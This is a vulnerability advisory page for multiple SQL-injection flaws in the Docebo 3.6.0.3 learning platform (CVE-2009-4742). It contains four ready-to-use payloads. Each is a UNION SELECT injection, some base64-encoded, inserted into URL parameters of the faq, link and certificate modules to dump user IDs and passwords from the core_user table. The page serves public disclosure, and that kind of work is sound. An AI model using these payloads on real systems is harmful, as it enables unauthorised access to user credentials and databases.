Docebo 3.6.0.3 Multiple SQL-Injection Vulnerabilities

2010-03-29 / 2010-03-30

Credit: Andrea Fabrizi

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-4742

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

**************************************************************
Application: Docebo
Version affected: 3.6.0.3
Website: http://www.docebo.com
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************

########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=hel
p&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
###############################

########## EXAMPLE 2 ##########
roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

-> http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=ke
yw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

###############################

########## EXAMPLE 3 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op
=elemmetacertificate&id_certificate=3222
union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2
###############################

########## EXAMPLE 4 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elem
certificate&id_certificate=1123
union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
###############################

--
Andrea Fabrizi
http://www.andreafabrizi.it

References:

http://xforce.iss.net/xforce/xfdb/53701

http://www.securityfocus.com/bid/36654

http://www.securityfocus.com/archive/1/archive/1/507072/100/0/threaded

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Docebo 3.6.0.3 Multiple SQL-Injection Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.